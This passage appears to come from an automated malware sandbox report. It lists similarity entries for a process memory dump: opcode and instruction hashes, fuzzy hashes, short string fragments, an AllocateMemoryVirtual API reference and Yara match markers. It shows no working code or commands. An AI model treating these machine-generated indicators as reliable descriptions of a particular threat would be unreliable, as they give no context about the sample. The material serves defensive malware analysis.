        • Opcode ID: 85c739ecdf5e2649450aed2f0afb97fa872434a7ca6bbac8e0a00c5ceed23042
        • Instruction ID: def27e2141d15aa7c834df2ed5212d0af7e8495ab13ca4b196c9010b325edeff
        • Opcode Fuzzy Hash: 85c739ecdf5e2649450aed2f0afb97fa872434a7ca6bbac8e0a00c5ceed23042
        • Instruction Fuzzy Hash: EF52DB726043899FDB758F38D9957DABBA2FF54350F52812EDC899B210C3719A81CB82
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: ZYa$\l9
        • API String ID: 0-2703591555
        • Opcode ID: 5897d5f9525e5ff67529982363bed710c20189dca9f061aac34544bf2a461cc2
        • Instruction ID: 3f855714ed432538c565aba5c6271955a72708364c48fb4240c77d8f6a39fbb6
        • Opcode Fuzzy Hash: 5897d5f9525e5ff67529982363bed710c20189dca9f061aac34544bf2a461cc2
        • Instruction Fuzzy Hash: 6B52DA726043899FDB758F38D9957DABBB2FF54350F52812EDC899B210C3709A91CB82
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: $w!$k7DL
        • API String ID: 0-3053937184
        • Opcode ID: ce7b4ced9cb69c0ae2d8276d44fa1b1abdd014b5bb482de5084ef2cbc1d9c1a1
        • Instruction ID: 8bef5101c4d6fbdb1890ce32c8feef31743bac611fbf5f7c20d8c2740281ab95
        • Opcode Fuzzy Hash: ce7b4ced9cb69c0ae2d8276d44fa1b1abdd014b5bb482de5084ef2cbc1d9c1a1
        • Instruction Fuzzy Hash: 8432AD72A046859FDB75DF28DC91BDAB7A6FF99310F15812AEC4DDB310D730AA418B80
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID: <$v].
        • API String ID: 2167126740-2854884050
        • Opcode ID: be7878d67aec070f92d5d86a1e4f74a9a4293870a558d9bf80648e44443528c3
        • Instruction ID: 582d5ac8e5c59baf2a671951b8b27563e8b4351e49914bfc992084c98745126a
        • Opcode Fuzzy Hash: be7878d67aec070f92d5d86a1e4f74a9a4293870a558d9bf80648e44443528c3
        • Instruction Fuzzy Hash: DE222472A043899FDB35AF29DC957EE77A2BF94340F56412EEC8D9B310D7309A818B41
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID: <$v].
        • API String ID: 2167126740-2854884050
        • Opcode ID: 7fe7c3fa8050b8e3f3f3d4bdeb46fee88ce79b3c487b2e35c585092b65a3d3b9
        • Instruction ID: 1276541557740e1f55e865fb0ce03ac0a486837e29a6c253a4ad5a9c8242cdaf
        • Opcode Fuzzy Hash: 7fe7c3fa8050b8e3f3f3d4bdeb46fee88ce79b3c487b2e35c585092b65a3d3b9
        • Instruction Fuzzy Hash: 99F14472A083899FDF359F28DC947EE77A2AF99310F66802EDC4D9B311D7305A818B51
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: <$v].
        • API String ID: 0-2854884050
        • Opcode ID: 380995033ca2d2a78ba2da5c78a896b17875eba64858888362ff1d3e385490c1
        • Instruction ID: e75ac77cc0e609a62b37d3cddbbdd55166d5d0ba3c2d3e5d5645c6e21fe803cc
        • Opcode Fuzzy Hash: 380995033ca2d2a78ba2da5c78a896b17875eba64858888362ff1d3e385490c1
        • Instruction Fuzzy Hash: F8B11372A042989FDF399F24DC557EE37A2AF99340F26442EDC8D9B710D7305E418B86
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: ZYa
        • API String ID: 0-34885360
        • Opcode ID: 478cf8f48f60a570b49276f411c99ab043c63a0e3cb50eb58cdfdc7a415b64a5
        • Instruction ID: cf4894d1dfcedab0dc2210df4e6181a685f77e640e93ba93421a4a2f2d982754
        • Opcode Fuzzy Hash: 478cf8f48f60a570b49276f411c99ab043c63a0e3cb50eb58cdfdc7a415b64a5
        • Instruction Fuzzy Hash: CD021CB26083499FCB659F39C9867DABBB2FF54350F42811DDC899B210C3749A91CF82
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: $w!
        • API String ID: 0-603683437
        • Opcode ID: e324d9a4c9be31d3d070fa90b6bbe30ccf38e579462bd9735fa085e89faa0296
        • Instruction ID: 32bf2ad1af8bcc6ced9dc2daed644ea55e68c8f8031a6448cf1ca41f9311e723
        • Opcode Fuzzy Hash: e324d9a4c9be31d3d070fa90b6bbe30ccf38e579462bd9735fa085e89faa0296
        • Instruction Fuzzy Hash: DDC18D72A047499FDB69CF28DC80BDAB7A5FF58310F15422AEC5C9B710D770AA51CB90
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: \l9
        • API String ID: 0-3627828189
        • Opcode ID: 7d97025c4d4862bfdad767e76500197aa9fb947aa4e679721482c0cbe57551b3
        • Instruction ID: 5b6b6279bd7dd188f97f243ce55329bc84e08a8c1fe441e3ea95239376a5fcd0
        • Opcode Fuzzy Hash: 7d97025c4d4862bfdad767e76500197aa9fb947aa4e679721482c0cbe57551b3
        • Instruction Fuzzy Hash: DEB1C872600388DFDF769F38DD927DA3BA2FF58340F51412AED899A220C7315A91CB46
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: Q@VF
        • API String ID: 0-1362175084
        • Opcode ID: d2537f0f5cac8d6bf64adb3c54f37ea4cd3cc62f5303651ca53f8d5a2b9fac4c
        • Instruction ID: 30bfaa09bc4dac0d75cb333e6d58e5e1004f11e52476c4bb844113a4f07be0aa
        • Opcode Fuzzy Hash: d2537f0f5cac8d6bf64adb3c54f37ea4cd3cc62f5303651ca53f8d5a2b9fac4c
        • Instruction Fuzzy Hash: C571CE726042889FCBB48E29DC557EB77E6AF98300F56851EEC4DCB314D3309A85CB05
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: Q@VF
        • API String ID: 0-1362175084
        • Opcode ID: ba5ee70da5d60e3ae9ebd1fae93dc955c432bed59ca8aa0d5e785172d1cb9890
        • Instruction ID: 1a9b4ce3e54ffefa0a287e5ee7be8bb9a9e66a20e213bd8b788e06c13aeac272
        • Opcode Fuzzy Hash: ba5ee70da5d60e3ae9ebd1fae93dc955c432bed59ca8aa0d5e785172d1cb9890
        • Instruction Fuzzy Hash: 0671BC726042889FDB788F299C557EBB7E6BF98340F16851EE84DCB350D7309A858B06
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: Q@VF
        • API String ID: 0-1362175084
        • Opcode ID: 0dbdcf19282f8a6abaef3d2b8fced3dc2a864e5a07b77d20f64635a4e315b800
        • Instruction ID: 1cc8f2eb8903c1e7630fe92bfaa0317345d85f35838460a2f3d982cc5ca77507
        • Opcode Fuzzy Hash: 0dbdcf19282f8a6abaef3d2b8fced3dc2a864e5a07b77d20f64635a4e315b800
        • Instruction Fuzzy Hash: BD5189726042889FDB748F29DC54BDBBBE6AF98350F15842AEC4CCB314D730AA85CB05
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: eOu0
        • API String ID: 0-585871311
        • Opcode ID: 0487643cb0e193c6dfbc68a192f9b5d9da51906b836a91a544e3237f58f1d9e3
        • Instruction ID: d34ee714639616095a4c372c6dfccc40deda9a146327c422e97bc9c9c2d909e3
        • Opcode Fuzzy Hash: 0487643cb0e193c6dfbc68a192f9b5d9da51906b836a91a544e3237f58f1d9e3
        • Instruction Fuzzy Hash: B751E1B7601B449BDB75CE29D9917D776F2AF98B00F1A052ECC8E4B700D734AA40CB56
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d1f8a5bc73ca5d1118ee654b52e20776cecf655bbd5a0b663ff036f97900bd9b
        • Instruction ID: 5ebf6999e3efd6a8d1ac41b3412638790476a3b31a82b8a7c40681b9b4824008
        • Opcode Fuzzy Hash: d1f8a5bc73ca5d1118ee654b52e20776cecf655bbd5a0b663ff036f97900bd9b
        • Instruction Fuzzy Hash: 0CB1B2625083C58FDB36CF3888987967FE2AF56360F0AC29AC8994F2E6D7348545C716
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e570b341dbd2d183bddd43e3170f2d397914bf9c6c6587003f354dc18784ffb1
        • Instruction ID: cd9cc44412bf9e0f8c086f74dabc218d41e60343eb6443cd9c0eba677c02d08b
        • Opcode Fuzzy Hash: e570b341dbd2d183bddd43e3170f2d397914bf9c6c6587003f354dc18784ffb1
        • Instruction Fuzzy Hash: 9471F372A08654DFDB35DE28D8A17DA77E2AF54300F8A412FDC498B744E730AE81CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3a1e48a51e6f004e2d06c7405b6740208b3dc67a808fca918fe48b417bbd8576
        • Instruction ID: 2f1fbdecce1d88051f83f806ffd8a487284819fdb108e67c4ad112a972edb1e4
        • Opcode Fuzzy Hash: 3a1e48a51e6f004e2d06c7405b6740208b3dc67a808fca918fe48b417bbd8576
        • Instruction Fuzzy Hash: 3351FE32504340CFCB65AF34D989BEABBB6FF59350F56495DEC8A9B211C3309A818B42
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c39aa16d6e13dad098edb465aff7ae88dc50fa2cd1edd7031f50b26cda80aa08
        • Instruction ID: eacef70d4e61669dcff0d7910fbfd3697386a1aacdf03b103957c22a7e27227d
        • Opcode Fuzzy Hash: c39aa16d6e13dad098edb465aff7ae88dc50fa2cd1edd7031f50b26cda80aa08
        • Instruction Fuzzy Hash: C751C276604249EFCB35AF38E9567EE3BB2BF44390F45051EEC8A9B250C7358A41CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9b75b37a6cdd9edaa3aa9f01531226495d095d289d260b96e37027190b8e30dd
        • Instruction ID: 82bf1dcdb76adf1bbf11ca2bf44bfe7cf6612a411f36311f892f79b9a5d06de0
        • Opcode Fuzzy Hash: 9b75b37a6cdd9edaa3aa9f01531226495d095d289d260b96e37027190b8e30dd
        • Instruction Fuzzy Hash: 0E513B729483858BCF39CF389CA47EA7BA2AF66310F19819FC85A8F385D7305641C725
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9c6e16f4c1e885e282ab1d61bca15d0ffff5d86e62bc67ec6a707b3bc7d5ac1c
        • Instruction ID: 3b538b2a992af7af0339db5254fd4f915c2ee75f902fa63bcdcf4513da804a4f
        • Opcode Fuzzy Hash: 9c6e16f4c1e885e282ab1d61bca15d0ffff5d86e62bc67ec6a707b3bc7d5ac1c
        • Instruction Fuzzy Hash: 205119B29483858BCF39CF389CA47EA7BA2AF66350F55825FC85A8F385D7304541C725
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a8030d3165dabed5ae71850c5d6ca1c02360af4694ea2aa89313b0acb2c8a9bd
        • Instruction ID: b83287cdc91587da5fe27b37051b99b553a0e29843d4407a7769766dacc141b0
        • Opcode Fuzzy Hash: a8030d3165dabed5ae71850c5d6ca1c02360af4694ea2aa89313b0acb2c8a9bd
        • Instruction Fuzzy Hash: 98412572908258ABDF39AF34D8557EF37B2AF49300F15452EDC49AB355D7301A818B92
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2d2c9d0c2d214f13645b0f05905d59354b1d9b5cdce2d2e4a0e9a445196deb90
        • Instruction ID: d9edfee0d4523758b21d9552e9b0dd9be3aed6c03fe6f5aeaec90a6054836173
        • Opcode Fuzzy Hash: 2d2c9d0c2d214f13645b0f05905d59354b1d9b5cdce2d2e4a0e9a445196deb90
        • Instruction Fuzzy Hash: 06412772909358AFDB359F34DC067EF37B6AF4A300F16411EDC499B245D7700A418B96
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID:
        • API String ID: 2167126740-0
        • Opcode ID: 4ef9387518809eaacb984a23fa93b8f70dcef0da26c52fdcd5ec1983c33e78ca
        • Instruction ID: e8d2c670a41e595bf26ca01cf26b38195050b3354a06f853d07dc4937419a7c2
        • Opcode Fuzzy Hash: 4ef9387518809eaacb984a23fa93b8f70dcef0da26c52fdcd5ec1983c33e78ca
        • Instruction Fuzzy Hash: 4341F272A043899BDB30AF64DC85BDE77B6FF95380F458429EC889B312D3348A81CB55
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3fd64fa94e57339830500fd1354d3c2557e256d4e71a6dc2a839401f1d190b0b
        • Instruction ID: 59bb7fb85adeca94938d5090c6458c805b5a7126fa24454cad7aa74d72a02b98
        • Opcode Fuzzy Hash: 3fd64fa94e57339830500fd1354d3c2557e256d4e71a6dc2a839401f1d190b0b
        • Instruction Fuzzy Hash: F021A6312087C18BDF72CEB8C8D4B86BA91AF46314F48C2ADC9984E6DBE2354543C752
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: acd64a3843bdfb710f3ec917ab0b35563eea504932bdc001ef303e66167dae7a
        • Instruction ID: fbc2258cafbb3dc496fc51e1da01c53f699a273d0c10c735cab9a3ce00b2411d
        • Opcode Fuzzy Hash: acd64a3843bdfb710f3ec917ab0b35563eea504932bdc001ef303e66167dae7a
        • Instruction Fuzzy Hash: DA119071A08354EFCB68AF64C9546EFB6F1EF54750F42081DDDCA96110D3315A81CB52
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 61f7c60f29ea27d67520e5ab18539727c07c365fae8bb87ecdf35a37f80130d8
        • Instruction ID: 846721f896c7793006503e9a4644205153a23cc7888e95f919475fe587511493
        • Opcode Fuzzy Hash: 61f7c60f29ea27d67520e5ab18539727c07c365fae8bb87ecdf35a37f80130d8
        • Instruction Fuzzy Hash: CB018C76A09744CFCB22CF24D8C9ADA73B5AB08740F01442ADA088B301D330AE44DB20
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f6178ff48dcd03d8b1d7dad661da46ade949e67a02951441900925447e096af3
        • Instruction ID: 9b58882fc44b06fe8cdadaa85c08d26b4e2b94a687addfedae82ff23338cfcaf
        • Opcode Fuzzy Hash: f6178ff48dcd03d8b1d7dad661da46ade949e67a02951441900925447e096af3
        • Instruction Fuzzy Hash: DFC04CB66125818BE741DB18C451B4073A1AB45B95B090694E8118B791C324E9108A00
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
        • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
        • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
        • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
        Uniqueness

        Uniqueness Score: -1.00%